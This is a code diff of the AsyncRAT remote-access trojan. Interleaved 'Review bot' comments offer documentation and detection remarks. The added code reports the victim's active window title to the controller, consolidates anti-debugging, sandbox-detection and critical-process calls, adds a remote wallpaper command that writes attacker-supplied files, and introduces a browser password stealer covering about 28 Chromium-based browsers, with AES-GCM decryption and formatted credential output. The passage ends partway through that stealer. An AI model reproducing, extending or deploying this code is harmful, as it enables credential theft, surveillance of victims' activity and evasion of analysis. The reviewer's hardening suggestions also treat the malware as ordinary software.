diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj
index 87c91cc..2dc329d 100644
--- a/AsyncRAT-C#/Client/Client.csproj
+++ b/AsyncRAT-C#/Client/Client.csproj
@@ -80,11 +80,11 @@
-
+
diff --git a/AsyncRAT-C#/Client/Connection/ClientSocket.cs b/AsyncRAT-C#/Client/Connection/ClientSocket.cs
index f49ff6b..67103e2 100644
--- a/AsyncRAT-C#/Client/Connection/ClientSocket.cs
+++ b/AsyncRAT-C#/Client/Connection/ClientSocket.cs
@@ -256,7 +256,7 @@ namespace Client.Connection
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
- msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"}";
+ msgpack.ForcePathObject("Message").AsString = Methods.GetActiveWindowTitle();
Send(msgpack.Encode2Bytes());
Ping?.Dispose();
Interval = 0;
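Review bot: The `Message` field assigned on the added line now carries whatever `Methods.GetActiveWindowTitle()` returns, and nothing at the call site says that the keep-alive has become a channel for user-activity data. Window titles routinely contain document names, page titles and mail subjects, so this one line changes what the `Ping` packet discloses; a comment such as `// Ping "Message" carries the foreground window title (user-activity data)` would make that visible to anyone analysing the protocol. For defenders it also means the client queries the foreground window from a background process, presumably once per ping, which is a behaviour endpoint telemetry can key on. The enclosing method starts and ends outside the hunk.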
diff --git a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
index c58fa2e..8a5eb8f 100644
--- a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
+++ b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
@@ -80,7 +80,7 @@ namespace Client.Helper
bool isDebuggerPresent = false;
try
{
- CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
+ NativeMethods.CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
catch
@@ -93,7 +93,7 @@ namespace Client.Helper
{
try
{
- if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
+ if (NativeMethods.GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
@@ -105,10 +105,5 @@ namespace Client.Helper
}
- [DllImport("kernel32.dll")]
- public static extern IntPtr GetModuleHandle(string lpModuleName);
-
- [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
- static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}
diff --git a/AsyncRAT-C#/Client/Helper/IdSender.cs b/AsyncRAT-C#/Client/Helper/IdSender.cs
index 2375ab0..bfbc47f 100644
--- a/AsyncRAT-C#/Client/Helper/IdSender.cs
+++ b/AsyncRAT-C#/Client/Helper/IdSender.cs
@@ -20,7 +20,7 @@ namespace Client.Helper
msgpack.ForcePathObject("Path").AsString = Application.ExecutablePath;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
- msgpack.ForcePathObject("Performance").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"}";
+ msgpack.ForcePathObject("Performance").AsString = "...";
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus();
msgpack.ForcePathObject("Installed").AsString = new FileInfo(Application.ExecutablePath).LastWriteTime.ToUniversalTime().ToString();
diff --git a/AsyncRAT-C#/Client/Helper/Methods.cs b/AsyncRAT-C#/Client/Helper/Methods.cs
index 8ca507b..1e673a4 100644
--- a/AsyncRAT-C#/Client/Helper/Methods.cs
+++ b/AsyncRAT-C#/Client/Helper/Methods.cs
@@ -5,6 +5,8 @@ using System.Management;
using System.Security.Principal;
using System.Drawing.Imaging;
using System.Runtime.InteropServices;
+using static Client.Helper.NativeMethods;
+using System.Text;
namespace Client.Helper
{
@@ -61,8 +63,7 @@ namespace Client.Helper
return null;
}
- [DllImport("kernel32.dll", SetLastError = true)]
- public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
+
public static void PreventSleep()
{
try
@@ -72,11 +73,20 @@ namespace Client.Helper
catch { }
}
- public enum EXECUTION_STATE : uint
+ public static string GetActiveWindowTitle()
{
- ES_CONTINUOUS = 0x80000000,
- ES_DISPLAY_REQUIRED = 0x00000002,
- ES_SYSTEM_REQUIRED = 0x00000001
+ try
+ {
+ const int nChars = 256;
+ StringBuilder buff = new StringBuilder(nChars);
+ IntPtr handle = GetForegroundWindow();
+ if (GetWindowText(handle, buff, nChars) > 0)
+ {
+ return buff.ToString();
+ }
+ }
+ catch { }
+ return "";
}
}
}
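Review bot: `GetActiveWindowTitle` is added without a doc comment, and its contract is not obvious from the name. It reads the title of whichever window has focus at the moment of the call (`GetForegroundWindow` then `GetWindowText`) into a 256-character buffer, and it returns `""` both when the window has no title and when the call throws, because of the bare `catch { }`. I would add a `<summary>` stating exactly that, and saying that the value describes the logged-in user's activity rather than this process.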
diff --git a/AsyncRAT-C#/Client/Helper/NativeMethods.cs b/AsyncRAT-C#/Client/Helper/NativeMethods.cs
new file mode 100644
index 0000000..d8f983e
--- /dev/null
+++ b/AsyncRAT-C#/Client/Helper/NativeMethods.cs
@@ -0,0 +1,34 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace Client.Helper
+{
+ public static class NativeMethods
+ {
+ [DllImport("user32.dll")]
+ public static extern IntPtr GetForegroundWindow();
+ [DllImport("user32.dll")]
+ public static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
+
+
+ [DllImport("kernel32.dll")]
+ public static extern IntPtr GetModuleHandle(string lpModuleName);
+ [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
+ public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
+ public enum EXECUTION_STATE : uint
+ {
+ ES_CONTINUOUS = 0x80000000,
+ ES_DISPLAY_REQUIRED = 0x00000002,
+ ES_SYSTEM_REQUIRED = 0x00000001
+ }
+
+ [DllImport("ntdll.dll", SetLastError = true)]
+ public static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
+ }
+}
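Review bot: None of the imports gathered in `NativeMethods` is documented, and three of them deserve a comment because of how this commit uses them: `CheckRemoteDebuggerPresent` and `GetModuleHandle` back the debugger and `SbieDll.dll` checks in `Anti_Analysis.cs`, and `RtlSetProcessIsCritical` is called with `1` in `ProcessCritical.cs`. The last one matters most to a responder, because terminating a process flagged as critical brings the host down with a bugcheck, so containment should not start with killing the process. A one-line comment per import, e.g. `// marks this process critical: terminating it bugchecks the host`, would record that. The combination of these imports in one static class is also a usable static indicator when triaging a sample.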
diff --git a/AsyncRAT-C#/Client/Helper/ProcessCritical.cs b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
index d6d62bc..513ec15 100644
--- a/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
+++ b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
@@ -20,7 +20,7 @@ namespace Client.Helper
{
SystemEvents.SessionEnding += new SessionEndingEventHandler(SystemEvents_SessionEnding);
Process.EnterDebugMode();
- RtlSetProcessIsCritical(1, 0, 0);
+ Helper.NativeMethods.RtlSetProcessIsCritical(1, 0, 0);
}
catch { }
}
@@ -28,7 +28,7 @@ namespace Client.Helper
{
try
{
- RtlSetProcessIsCritical(0, 0, 0);
+ NativeMethods.RtlSetProcessIsCritical(0, 0, 0);
}
catch
{
@@ -38,10 +38,5 @@ namespace Client.Helper
}
}
}
-
- #region "Native Methods"
- [DllImport("ntdll.dll", SetLastError = true)]
- private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
- #endregion
}
}
diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs
index 9422cd9..93c34d3 100644
--- a/AsyncRAT-C#/Client/Program.cs
+++ b/AsyncRAT-C#/Client/Program.cs
@@ -40,7 +40,7 @@ namespace Client
Methods.PreventSleep(); //prevent pc to idle\sleep
- new CheckMiner().GetProcess(); //check miner status
+ //new CheckMiner().GetProcess(); //check miner status
}
catch { }
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
index 0a82132..4453ae4 100644
--- a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
@@ -35,6 +35,7 @@
+
@@ -46,6 +47,7 @@
+
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Handler/Wallpaper.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Handler/Wallpaper.cs
new file mode 100644
index 0000000..5417529
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Handler/Wallpaper.cs
@@ -0,0 +1,40 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Drawing;
+using System.Drawing.Imaging;
+using System.IO;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace Plugin.Handler
+{
+ public class Wallpaper
+ {
+ [DllImport("user32.dll")]
+ public static extern uint SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);
+ public static readonly uint SPI_SETDESKWALLPAPER = 0x14;
+ public static readonly uint SPIF_UPDATEINIFILE = 0x01;
+ public static readonly uint SPIF_SENDWININICHANGE = 0x02;
+
+ public void Change(byte[] img, string exe)
+ {
+ string path1 = Path.Combine(Path.GetTempFileName() + exe);
+ string path2 = Path.Combine(Path.GetTempFileName() + exe);
+ File.WriteAllBytes(path1, img);
+
+ using (Bitmap bmp = new Bitmap(path1))
+ using (Graphics graphics = Graphics.FromImage(bmp))
+ {
+ bmp.Save(path2, ImageFormat.Bmp);
+ }
+ using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Control Panel\Desktop", true))
+ {
+ key.SetValue("WallpaperStyle", 2.ToString());
+ key.SetValue("TileWallpaper", 0.ToString());
+ }
+ SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, path2, SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE);
+ }
+ }
+}
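Review bot: `Change` writes the `img` bytes to disk before anything has checked that they are an image, under a name whose suffix is the caller-supplied `exe` string; both values come straight from the network packet handled in `Packet.cs`. As written, sender-chosen bytes land in the temp directory with a sender-chosen suffix, and they stay there if `new Bitmap(path1)` throws. The suffix should be checked against a short list of image extensions before the write, e.g. `if (!allowed.Contains(exe.ToLowerInvariant())) return;`, where `allowed` is a set you define. For detection the method is easy to observe: each call creates files in the user's temp directory, sets `WallpaperStyle` and `TileWallpaper` under `HKCU\Control Panel\Desktop`, and calls `SystemParametersInfo` with `SPI_SETDESKWALLPAPER`.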
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
index 0ee88e8..93d0bd5 100644
--- a/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
@@ -3,6 +3,7 @@ using Plugin.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
+using System.Drawing;
using System.IO;
using System.Linq;
using System.Management;
@@ -23,6 +24,12 @@ namespace Plugin
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
+ case "wallpaper":
+ {
+ new Wallpaper().Change(unpack_msgpack.ForcePathObject("Image").GetAsBytes(), unpack_msgpack.ForcePathObject("Exe").AsString);
+ break;
+ }
+
case "visitURL":
{
string url = unpack_msgpack.ForcePathObject("URL").AsString;
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Account.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Account.cs
new file mode 100644
index 0000000..2719d2d
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Account.cs
@@ -0,0 +1,18 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace Plugin.Browsers.Chromium
+{
+ public class Account
+ {
+ public string UserName { get; set; }
+
+ public string Password { get; set; }
+
+ public string URL { get; set; }
+
+ public string Application { get; set; }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/AesGcm.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/AesGcm.cs
new file mode 100644
index 0000000..1a1ae56
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/AesGcm.cs
@@ -0,0 +1,137 @@
+using System;
+using System.Collections.Generic;
+using System.Runtime.InteropServices;
+using System.Security.Cryptography;
+using System.Text;
+
+
+namespace Plugin.Browsers.Chromium
+{
+ //AES GCM from https://github.com/dvsekhvalnov/jose-jwt
+ class AesGcm
+ {
+ public byte[] Decrypt(byte[] key, byte[] iv, byte[] aad, byte[] cipherText, byte[] authTag)
+ {
+ IntPtr hAlg = OpenAlgorithmProvider(BCrypt.BCRYPT_AES_ALGORITHM, BCrypt.MS_PRIMITIVE_PROVIDER, BCrypt.BCRYPT_CHAIN_MODE_GCM);
+ IntPtr hKey, keyDataBuffer = ImportKey(hAlg, key, out hKey);
+
+ byte[] plainText;
+
+ var authInfo = new BCrypt.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(iv, aad, authTag);
+ using (authInfo)
+ {
+ byte[] ivData = new byte[MaxAuthTagSize(hAlg)];
+
+ int plainTextSize = 0;
+
+ uint status = BCrypt.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref authInfo, ivData, ivData.Length, null, 0, ref plainTextSize, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() (get size) failed with status code: {0}", status));
+
+ plainText = new byte[plainTextSize];
+
+ status = BCrypt.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref authInfo, ivData, ivData.Length, plainText, plainText.Length, ref plainTextSize, 0x0);
+
+ if (status == BCrypt.STATUS_AUTH_TAG_MISMATCH)
+ throw new CryptographicException("BCrypt.BCryptDecrypt(): authentication tag mismatch");
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() failed with status code:{0}", status));
+ }
+
+ BCrypt.BCryptDestroyKey(hKey);
+ Marshal.FreeHGlobal(keyDataBuffer);
+ BCrypt.BCryptCloseAlgorithmProvider(hAlg, 0x0);
+
+ return plainText;
+ }
+
+ private int MaxAuthTagSize(IntPtr hAlg)
+ {
+ byte[] tagLengthsValue = GetProperty(hAlg, BCrypt.BCRYPT_AUTH_TAG_LENGTH);
+
+ return BitConverter.ToInt32(new[] { tagLengthsValue[4], tagLengthsValue[5], tagLengthsValue[6], tagLengthsValue[7] }, 0);
+ }
+
+ private IntPtr OpenAlgorithmProvider(string alg, string provider, string chainingMode)
+ {
+ IntPtr hAlg = IntPtr.Zero;
+
+ uint status = BCrypt.BCryptOpenAlgorithmProvider(out hAlg, alg, provider, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptOpenAlgorithmProvider() failed with status code:{0}", status));
+
+ byte[] chainMode = Encoding.Unicode.GetBytes(chainingMode);
+ status = BCrypt.BCryptSetAlgorithmProperty(hAlg, BCrypt.BCRYPT_CHAINING_MODE, chainMode, chainMode.Length, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptSetAlgorithmProperty(BCrypt.BCRYPT_CHAINING_MODE, BCrypt.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0}", status));
+
+ return hAlg;
+ }
+
+ private IntPtr ImportKey(IntPtr hAlg, byte[] key, out IntPtr hKey)
+ {
+ byte[] objLength = GetProperty(hAlg, BCrypt.BCRYPT_OBJECT_LENGTH);
+
+ int keyDataSize = BitConverter.ToInt32(objLength, 0);
+
+ IntPtr keyDataBuffer = Marshal.AllocHGlobal(keyDataSize);
+
+ byte[] keyBlob = Concat(BCrypt.BCRYPT_KEY_DATA_BLOB_MAGIC, BitConverter.GetBytes(0x1), BitConverter.GetBytes(key.Length), key);
+
+ uint status = BCrypt.BCryptImportKey(hAlg, IntPtr.Zero, BCrypt.BCRYPT_KEY_DATA_BLOB, out hKey, keyDataBuffer, keyDataSize, keyBlob, keyBlob.Length, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptImportKey() failed with status code:{0}", status));
+
+ return keyDataBuffer;
+ }
+
+ private byte[] GetProperty(IntPtr hAlg, string name)
+ {
+ int size = 0;
+
+ uint status = BCrypt.BCryptGetProperty(hAlg, name, null, 0, ref size, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptGetProperty() (get size) failed with status code:{0}", status));
+
+ byte[] value = new byte[size];
+
+ status = BCrypt.BCryptGetProperty(hAlg, name, value, value.Length, ref size, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptGetProperty() failed with status code:{0}", status));
+
+ return value;
+ }
+
+ public byte[] Concat(params byte[][] arrays)
+ {
+ int len = 0;
+
+ foreach (byte[] array in arrays)
+ {
+ if (array == null)
+ continue;
+ len += array.Length;
+ }
+
+ byte[] result = new byte[len - 1 + 1];
+ int offset = 0;
+
+ foreach (byte[] array in arrays)
+ {
+ if (array == null)
+ continue;
+ Buffer.BlockCopy(array, 0, result, offset, array.Length);
+ offset += array.Length;
+ }
+
+ return result;
+ }
+ }
+}
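Review bot: The only record of where this class came from is the comment `//AES GCM from https://github.com/dvsekhvalnov/jose-jwt`, with no upstream version, commit or licence, so the copy cannot be diffed against the library it was taken from. I would extend the comment to `// AES-GCM via CNG, copied from jose-jwt (<upstream commit>, <licence>)` with the real values filled in. For analysts the verbatim reuse is useful in the other direction: unless the build is obfuscated, the exception strings in this file, such as `BCrypt.BCryptDecrypt(): authentication tag mismatch`, remain in the compiled assembly and tie a sample to this code.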
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/BCrypt.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/BCrypt.cs
new file mode 100644
index 0000000..5603a84
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/BCrypt.cs
@@ -0,0 +1,179 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Runtime.InteropServices;
+using System.Security.Cryptography;
+
+namespace Plugin.Browsers.Chromium
+{
+ public static class BCrypt
+ {
+ public const uint ERROR_SUCCESS = 0x00000000;
+ public const uint BCRYPT_PAD_PSS = 8;
+ public const uint BCRYPT_PAD_OAEP = 4;
+
+ public static readonly byte[] BCRYPT_KEY_DATA_BLOB_MAGIC = BitConverter.GetBytes(0x4d42444b);
+
+ public static readonly string BCRYPT_OBJECT_LENGTH = "ObjectLength";
+ public static readonly string BCRYPT_CHAIN_MODE_GCM = "ChainingModeGCM";
+ public static readonly string BCRYPT_AUTH_TAG_LENGTH = "AuthTagLength";
+ public static readonly string BCRYPT_CHAINING_MODE = "ChainingMode";
+ public static readonly string BCRYPT_KEY_DATA_BLOB = "KeyDataBlob";
+ public static readonly string BCRYPT_AES_ALGORITHM = "AES";
+
+ public static readonly string MS_PRIMITIVE_PROVIDER = "Microsoft Primitive Provider";
+
+ public static readonly int BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG = 0x00000001;
+ public static readonly int BCRYPT_INIT_AUTH_MODE_INFO_VERSION = 0x00000001;
+
+ public static readonly uint STATUS_AUTH_TAG_MISMATCH = 0xC000A002;
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct BCRYPT_PSS_PADDING_INFO
+ {
+ public BCRYPT_PSS_PADDING_INFO(string pszAlgId, int cbSalt)
+ {
+ this.pszAlgId = pszAlgId;
+ this.cbSalt = cbSalt;
+ }
+
+ [MarshalAs(UnmanagedType.LPWStr)]
+ public string pszAlgId;
+ public int cbSalt;
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO : IDisposable
+ {
+ public int cbSize;
+ public int dwInfoVersion;
+ public IntPtr pbNonce;
+ public int cbNonce;
+ public IntPtr pbAuthData;
+ public int cbAuthData;
+ public IntPtr pbTag;
+ public int cbTag;
+ public IntPtr pbMacContext;
+ public int cbMacContext;
+ public int cbAAD;
+ public long cbData;
+ public int dwFlags;
+
+ public BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(byte[] iv, byte[] aad, byte[] tag) : this()
+ {
+ dwInfoVersion = BCRYPT_INIT_AUTH_MODE_INFO_VERSION;
+ cbSize = Marshal.SizeOf(typeof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO));
+
+ if (iv != null)
+ {
+ cbNonce = iv.Length;
+ pbNonce = Marshal.AllocHGlobal(cbNonce);
+ Marshal.Copy(iv, 0, pbNonce, cbNonce);
+ }
+
+ if (aad != null)
+ {
+ cbAuthData = aad.Length;
+ pbAuthData = Marshal.AllocHGlobal(cbAuthData);
+ Marshal.Copy(aad, 0, pbAuthData, cbAuthData);
+ }
+
+ if (tag != null)
+ {
+ cbTag = tag.Length;
+ pbTag = Marshal.AllocHGlobal(cbTag);
+ Marshal.Copy(tag, 0, pbTag, cbTag);
+
+ cbMacContext = tag.Length;
+ pbMacContext = Marshal.AllocHGlobal(cbMacContext);
+ }
+ }
+
+ public void Dispose()
+ {
+ if (pbNonce != IntPtr.Zero) Marshal.FreeHGlobal(pbNonce);
+ if (pbTag != IntPtr.Zero) Marshal.FreeHGlobal(pbTag);
+ if (pbAuthData != IntPtr.Zero) Marshal.FreeHGlobal(pbAuthData);
+ if (pbMacContext != IntPtr.Zero) Marshal.FreeHGlobal(pbMacContext);
+ }
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct BCRYPT_KEY_LENGTHS_STRUCT
+ {
+ public int dwMinLength;
+ public int dwMaxLength;
+ public int dwIncrement;
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct BCRYPT_OAEP_PADDING_INFO
+ {
+ public BCRYPT_OAEP_PADDING_INFO(string alg)
+ {
+ pszAlgId = alg;
+ pbLabel = IntPtr.Zero;
+ cbLabel = 0;
+ }
+
+ [MarshalAs(UnmanagedType.LPWStr)]
+ public string pszAlgId;
+ public IntPtr pbLabel;
+ public int cbLabel;
+ }
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptOpenAlgorithmProvider(out IntPtr phAlgorithm,
+ [MarshalAs(UnmanagedType.LPWStr)] string pszAlgId,
+ [MarshalAs(UnmanagedType.LPWStr)] string pszImplementation,
+ uint dwFlags);
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptCloseAlgorithmProvider(IntPtr hAlgorithm, uint flags);
+
+ [DllImport("bcrypt.dll", EntryPoint = "BCryptGetProperty")]
+ public static extern uint BCryptGetProperty(IntPtr hObject, [MarshalAs(UnmanagedType.LPWStr)] string pszProperty, byte[] pbOutput, int cbOutput, ref int pcbResult, uint flags);
+
+ [DllImport("bcrypt.dll", EntryPoint = "BCryptSetProperty")]
+ internal static extern uint BCryptSetAlgorithmProperty(IntPtr hObject, [MarshalAs(UnmanagedType.LPWStr)] string pszProperty, byte[] pbInput, int cbInput, int dwFlags);
+
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptImportKey(IntPtr hAlgorithm,
+ IntPtr hImportKey,
+ [MarshalAs(UnmanagedType.LPWStr)] string pszBlobType,
+ out IntPtr phKey,
+ IntPtr pbKeyObject,
+ int cbKeyObject,
+ byte[] pbInput, //blob of type BCRYPT_KEY_DATA_BLOB + raw key data = (dwMagic (4 bytes) | uint dwVersion (4 bytes) | cbKeyData (4 bytes) | data)
+ int cbInput,
+ uint dwFlags);
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptDestroyKey(IntPtr hKey);
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptEncrypt(IntPtr hKey,
+ byte[] pbInput,
+ int cbInput,
+ ref BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO pPaddingInfo,
+ byte[] pbIV, int cbIV,
+ byte[] pbOutput,
+ int cbOutput,
+ ref int pcbResult,
+ uint dwFlags);
+
+ [DllImport("bcrypt.dll")]
+ internal static extern uint BCryptDecrypt(IntPtr hKey,
+ byte[] pbInput,
+ int cbInput,
+ ref BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO pPaddingInfo,
+ byte[] pbIV,
+ int cbIV,
+ byte[] pbOutput,
+ int cbOutput,
+ ref int pcbResult,
+ int dwFlags);
+ }
+
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
index 0d48f57..873fb5e 100644
--- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
@@ -2,6 +2,7 @@
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;
+using System.Security.Cryptography;
using System.Text;
using Plugin.Browsers.Chromium;
@@ -9,6 +10,8 @@ namespace Plugin.Browsers.Chromium
{
public class Chromium
{
+ public static string LocalApplicationData = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
+ public static string ApplicationData = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
public void CookiesRecovery(StringBuilder Coocks)
{
@@ -118,154 +121,310 @@ namespace Plugin.Browsers.Chromium
}
}
-
- public void Recovery(StringBuilder Pass)
+ public static StringBuilder Recovery(StringBuilder stringBuilder)
{
- try
+ Dictionary ChromiumPaths = new Dictionary()
{
- foreach (string str in this.GetAppDataFolders())
+ {
+ "Chrome",
+ LocalApplicationData + @"\Google\Chrome\User Data"
+ },
+ {
+ "Opera",
+ Path.Combine(ApplicationData, @"Opera Software\Opera Stable")
+ },
+ {
+ "Yandex",
+ Path.Combine(LocalApplicationData, @"Yandex\YandexBrowser\User Data")
+ },
+ {
+ "360 Browser",
+ LocalApplicationData + @"\360Chrome\Chrome\User Data"
+ },
+ {
+ "Comodo Dragon",
+ Path.Combine(LocalApplicationData, @"Comodo\Dragon\User Data")
+ },
+ {
+ "CoolNovo",
+ Path.Combine(LocalApplicationData, @"MapleStudio\ChromePlus\User Data")
+ },
+ {
+ "SRWare Iron",
+ Path.Combine(LocalApplicationData, @"Chromium\User Data")
+ },
+ {
+ "Torch Browser",
+ Path.Combine(LocalApplicationData, @"Torch\User Data")
+ },
+ {
+ "Brave Browser",
+ Path.Combine(LocalApplicationData, @"BraveSoftware\Brave-Browser\User Data")
+ },
+ {
+ "Iridium Browser",
+ LocalApplicationData + @"\Iridium\User Data"
+ },
+ {
+ "7Star",
+ Path.Combine(LocalApplicationData, @"7Star\7Star\User Data")
+ },
+ {
+ "Amigo",
+ Path.Combine(LocalApplicationData, @"Amigo\User Data")
+ },
+ {
+ "CentBrowser",
+ Path.Combine(LocalApplicationData, @"CentBrowser\User Data")
+ },
+ {
+ "Chedot",
+ Path.Combine(LocalApplicationData, @"Chedot\User Data")
+ },
+ {
+ "CocCoc",
+ Path.Combine(LocalApplicationData, @"CocCoc\Browser\User Data")
+ },
+ {
+ "Elements Browser",
+ Path.Combine(LocalApplicationData, @"Elements Browser\User Data")
+ },
+ {
+ "Epic Privacy Browser",
+ Path.Combine(LocalApplicationData, @"Epic Privacy Browser\User Data")
+ },
+ {
+ "Kometa",
+ Path.Combine(LocalApplicationData, @"Kometa\User Data")
+ },
+ {
+ "Orbitum",
+ Path.Combine(LocalApplicationData, @"Orbitum\User Data")
+ },
+ {
+ "Sputnik",
+ Path.Combine(LocalApplicationData, @"Sputnik\Sputnik\User Data")
+ },
+ {
+ "uCozMedia",
+ Path.Combine(LocalApplicationData, @"uCozMedia\Uran\User Data")
+ },
+ {
+ "Vivaldi",
+ Path.Combine(LocalApplicationData, @"Vivaldi\User Data")
+ },
+ {
+ "Sleipnir 6",
+ Path.Combine(ApplicationData, @"Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer")
+ },
+ {
+ "Citrio",
+ Path.Combine(LocalApplicationData, @"CatalinaGroup\Citrio\User Data")
+ },
+ {
+ "Coowon",
+ Path.Combine(LocalApplicationData, @"Coowon\Coowon\User Data")
+ },
+ {
+ "Liebao Browser",
+ Path.Combine(LocalApplicationData, @"liebao\User Data")
+ },
+ {
+ "QIP Surf",
+ Path.Combine(LocalApplicationData, @"QIP Surf\User Data")
+ },
+ {
+ "Edge Chromium",
+ Path.Combine(LocalApplicationData, @"Microsoft\Edge\User Data")
+ }
+ };
+
+ var list = new List();
+
+ foreach (var item in ChromiumPaths)
+ list.AddRange(Accounts(item.Value, item.Key));
+
+ foreach (var b in list)
+ {
+ stringBuilder.Append("Url: " + b.URL + "\n");
+ stringBuilder.Append("Username: " + b.UserName + "\n");
+ stringBuilder.Append("Password: " + b.Password + "\n");
+ stringBuilder.Append("Application: " + b.Application + "\n");
